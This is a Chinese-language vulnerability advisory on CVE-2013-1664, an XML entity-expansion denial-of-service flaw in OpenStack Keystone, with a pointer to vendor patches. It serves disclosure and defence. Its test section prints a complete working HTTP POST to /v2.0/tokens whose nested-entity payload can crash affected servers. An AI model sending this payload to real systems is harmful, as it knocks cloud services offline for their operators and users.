多个OpenStack产品拒绝服务漏洞(CVE-2013-1664)

文章由LinuxBoy分享于2019-04-02 04:04:39热评（620）

多个OpenStack产品拒绝服务漏洞(CVE-2013-1664)

发布日期：2013-01-16
更新日期：2013-04-07

受影响系统：
openstack OpenStack Dashboard (Horizon)
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 58892
CVE(CAN) ID: CVE-2013-1664

OpenStack是可大规模扩展的云操作系统。

多个OpenStack产品存在安全漏洞，远程未经认证的攻击者可利用这些漏洞使受影响应用崩溃。

<*来源：Jonathan Murray
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Jonathan Murray （）提供了如下测试方法：

DoS keystone servers using XML entities in Keystone requests.

-----------------------------------------------

POST /v2.0/tokens HTTP/1.1
content-type: application/xml

<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>

-----------------------------------------------

建议：
--------------------------------------------------------------------------------
厂商补丁：

openstack
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://lists.openstack.org/pipermail/openstack-announce/

推荐文章：

多个OpenStack产品拒绝服务漏洞(CVE-2013-1664)